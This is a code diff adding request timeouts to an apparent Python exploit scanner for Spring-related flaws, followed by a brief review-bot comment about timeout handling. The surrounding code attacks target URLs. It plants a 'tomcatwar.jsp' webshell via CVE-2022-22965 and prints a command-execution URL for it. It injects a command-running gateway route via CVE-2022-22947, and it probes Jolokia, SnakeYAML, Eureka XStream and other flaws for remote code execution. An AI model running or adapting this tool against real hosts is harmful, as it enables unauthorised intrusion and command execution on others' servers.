99from time import sleep
1010import urllib3
1111urllib3 .disable_warnings ()
12- requests . timeout = 10
12+ outtime = 10
1313
1414ua = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36,Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" ,
1515 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36,Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" ,
@@ -36,13 +36,13 @@ def CVE_2022_22965(url, proxies):
3636 getpayload = url + payload_http
3737 try :
3838 requests .packages .urllib3 .disable_warnings ()
39- requests .post (url , headers = Headers_1 , data = data1 , allow_redirects = False , verify = False , proxies = proxies )
39+ requests .post (url , headers = Headers_1 , timeout = outtime , data = data1 , allow_redirects = False , verify = False , proxies = proxies )
4040 sleep (0.5 )
41- requests .post (url , headers = Headers_1 , data = data2 , allow_redirects = False , verify = False , proxies = proxies )
41+ requests .post (url , headers = Headers_1 , timeout = outtime , data = data2 , allow_redirects = False , verify = False , proxies = proxies )
4242 sleep (0.5 )
43- requests .get (getpayload , headers = Headers_1 , allow_redirects = False , verify = False , proxies = proxies )
43+ requests .get (getpayload , headers = Headers_1 , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
4444 sleep (0.5 )
45- test = requests .get (url + "tomcatwar.jsp" , allow_redirects = False , verify = False , proxies = proxies )
45+ test = requests .get (url + "tomcatwar.jsp" , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
4646 if (test .status_code == 200 ):
4747 cprint ("[+] [CVE-2022-22965] Webshell为:" + url + "tomcatwar.jsp?pwd=tomcat&cmd=whoami" ,"red" )
4848 f2 = open ("vulout.txt" , "a" )
@@ -76,7 +76,7 @@ def CVE_2022_22963(url, proxies):
7676 try :
7777 urltest = url + path
7878 requests .packages .urllib3 .disable_warnings ()
79- req = requests .post (url = urltest , headers = header , data = data , verify = False , proxies = proxies )
79+ req = requests .post (url = urltest , headers = header , timeout = outtime , data = data , verify = False , proxies = proxies )
8080 code = req .status_code
8181 text = req .text
8282 rsp = '"error":"Internal Server Error"'
@@ -123,29 +123,29 @@ def CVE_2022_22947(url, proxies):
123123
124124 try :
125125 requests .packages .urllib3 .disable_warnings ()
126- re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , data = payload_linux , headers = headers1 , json = json ,verify = False , proxies = proxies )
127- re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
128- re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
126+ re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , timeout = outtime , data = payload_linux , headers = headers1 , json = json ,verify = False , proxies = proxies )
127+ re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
128+ re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
129129 if ('uid=' in str (re3 .text )) and ('gid=' in str (re3 .text )) and ('groups=' in str (re3 .text )):
130130 cprint (f'[+] [CVE-2022-22947] { url } ' , "red" )
131131 f2 = open ("vulout.txt" , "a" )
132132 f2 .write ("[+] [CVE-2022-22947] " + url + '\n ' )
133133 f2 .close ()
134134 else :
135- re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
136- re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
137- re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , data = payload_windows , headers = headers1 , json = json ,verify = False , proxies = proxies )
138- re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
139- re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
135+ re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
136+ re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
137+ re1 = requests .post (url = url + "actuator/gateway/routes/hacktest" , data = payload_windows , headers = headers1 , timeout = outtime , json = json ,verify = False , proxies = proxies )
138+ re2 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
139+ re3 = requests .get (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
140140 if ('<DIR>' in str (re3 .text )):
141141 cprint (f'[+] [CVE-2022-22947] { url } ' , "red" )
142142 f2 = open ("vulout.txt" , "a" )
143143 f2 .write ("[+] [CVE-2022-22947] " + url + '\n ' )
144144 f2 .close ()
145145 else :
146146 cprint ("[-] 目标 " + url + " 验证CVE-2022-22947漏洞不存在" , "yellow" )
147- re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , verify = False , proxies = proxies )
148- re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , verify = False , proxies = proxies )
147+ re4 = requests .delete (url = url + "actuator/gateway/routes/hacktest" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
148+ re5 = requests .post (url = url + "actuator/gateway/refresh" , headers = headers2 , timeout = outtime , verify = False , proxies = proxies )
149149 except KeyboardInterrupt :
150150 print ("Ctrl + C 手动终止了进程" )
151151 sys .exit ()
@@ -171,7 +171,7 @@ def JeeSpring_2023(url,proxies):
171171
172172 try :
173173 requests .packages .urllib3 .disable_warnings ()
174- re1 = requests .post (url = url + path , data = payload , headers = headers1 , verify = False , proxies = proxies )
174+ re1 = requests .post (url = url + path , data = payload , headers = headers1 , timeout = outtime , verify = False , proxies = proxies )
175175 code1 = re1 .status_code
176176 if ('jsp' in str (re1 .text )) and (int (code1 ) == 200 ):
177177 cprint (f'[+] [JeeSpring_2023] { url } ' , "red" )
@@ -196,12 +196,12 @@ def JolokiaRCE(url,proxies):
196196
197197 try :
198198 requests .packages .urllib3 .disable_warnings ()
199- re1 = requests .post (url = url + path1 , allow_redirects = False , verify = False , proxies = proxies )
199+ re1 = requests .post (url = url + path1 , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
200200 code1 = re1 .status_code
201- re2 = requests .post (url = url + path2 , allow_redirects = False , verify = False , proxies = proxies )
201+ re2 = requests .post (url = url + path2 , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
202202 code2 = re2 .status_code
203203 if ((int (code1 ) == 200 ) or (int (code2 ) == 200 )):
204- retest = requests .get (url = url + path3 , verify = False , proxies = proxies )
204+ retest = requests .get (url = url + path3 , timeout = outtime , verify = False , proxies = proxies )
205205 code3 = retest .status_code
206206 if ('reloadByURL' in str (retest .text )) and (code3 == 200 ):
207207 cprint (f'[+] [Jolokia-Realm-JNDI-RCE-1] { url } ' , "red" )
@@ -232,10 +232,10 @@ def CVE_2021_21234(url,proxies):
232232
233233 try :
234234 requests .packages .urllib3 .disable_warnings ()
235- re1 = requests .post (url = url + payload1 , verify = False , proxies = proxies )
236- re2 = requests .post (url = url + payload2 , verify = False , proxies = proxies )
237- re3 = requests .post (url = url + payload3 , verify = False , proxies = proxies )
238- re4 = requests .post (url = url + payload4 , verify = False , proxies = proxies )
235+ re1 = requests .post (url = url + payload1 , timeout = outtime , verify = False , proxies = proxies )
236+ re2 = requests .post (url = url + payload2 , timeout = outtime , verify = False , proxies = proxies )
237+ re3 = requests .post (url = url + payload3 , timeout = outtime , verify = False , proxies = proxies )
238+ re4 = requests .post (url = url + payload4 , timeout = outtime , verify = False , proxies = proxies )
239239 if (('MAPI' in str (re1 .text )) or ('MAPI' in str (re2 .text ))):
240240 cprint (f'[+] [CVE-2021-21234-Win] { url } ' , "red" )
241241 f2 = open ("vulout.txt" , "a" )
@@ -273,8 +273,8 @@ def SnakeYAML_RCE(url,proxies):
273273 try :
274274 requests .packages .urllib3 .disable_warnings ()
275275 urltest = url + path
276- re1 = requests .post (url = urltest , headers = Headers_1 , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
277- re2 = requests .post (url = urltest , headers = Headers_2 , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
276+ re1 = requests .post (url = urltest , headers = Headers_1 , timeout = outtime , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
277+ re2 = requests .post (url = urltest , headers = Headers_2 , timeout = outtime , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
278278 if ('example.yml' in str (re1 .text )):
279279 cprint (f'[+] [SnakeYAML_RCE-1] { url } ' , "red" )
280280 f2 = open ("vulout.txt" , "a" )
@@ -314,8 +314,8 @@ def Eureka_xstream_RCE(url,proxies):
314314 requests .packages .urllib3 .disable_warnings ()
315315 urltest1 = url + path1
316316 urltest2 = url + path2
317- re1 = requests .post (url = urltest1 , headers = Headers_1 , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
318- re2 = requests .post (url = urltest2 , headers = Headers_2 , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
317+ re1 = requests .post (url = urltest1 , headers = Headers_1 , timeout = outtime , data = payload_1 , allow_redirects = False , verify = False , proxies = proxies )
318+ re2 = requests .post (url = urltest2 , headers = Headers_2 , timeout = outtime , data = payload_2 , allow_redirects = False , verify = False , proxies = proxies )
319319 if ('127.0.0.2' in str (re1 .text )):
320320 cprint (f'[+] [Eureka_Xstream-1] { url } ' , "red" )
321321 f2 = open ("vulout.txt" , "a" )
@@ -350,7 +350,7 @@ def CVE_2018_1273(url,proxies):
350350 requests .packages .urllib3 .disable_warnings ()
351351 urltest1 = url + path1
352352 urltest2 = url + path2
353- re1 = requests .get (url = urltest1 , headers = Headers , allow_redirects = False , verify = False , proxies = proxies )
353+ re1 = requests .get (url = urltest1 , headers = Headers , timeout = outtime , allow_redirects = False , verify = False , proxies = proxies )
354354 code1 = re1 .status_code
355355 if ((int (code1 ) == 200 ) and ('Users' in str (re1 .text ))):
356356 cprint (f'[+] [CVE-2018-1273] { url } ' , "red" )
@@ -415,7 +415,7 @@ def poc(filename,proxies):
415415 url = url + "/"
416416 try :
417417 requests .packages .urllib3 .disable_warnings ()
418- r = requests .get (url , verify = False , proxies = proxies )
418+ r = requests .get (url , timeout = outtime , verify = False , proxies = proxies )
419419 if r .status_code == 503 :
420420 continue
421421 except KeyboardInterrupt :
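Review bot: The `timeout = outtime` arguments added throughout this file turn a silent hang into a raised `requests.exceptions.Timeout`, and the only handler visible in these hunks is `except KeyboardInterrupt` (in CVE_2022_22947 and in poc). The remaining `except` clauses of every touched function lie outside the hunks, so it is worth confirming that each `try` also catches `requests.exceptions.RequestException`. Note too that requests applies the value to the connect phase and to each read separately, so 10 is not a ceiling on the total time a request can take. I would record that at the definition with `# seconds; applied by requests to connect and to each read, not a total per-call limit`, and name the module constant `REQUEST_TIMEOUT` rather than `outtime`.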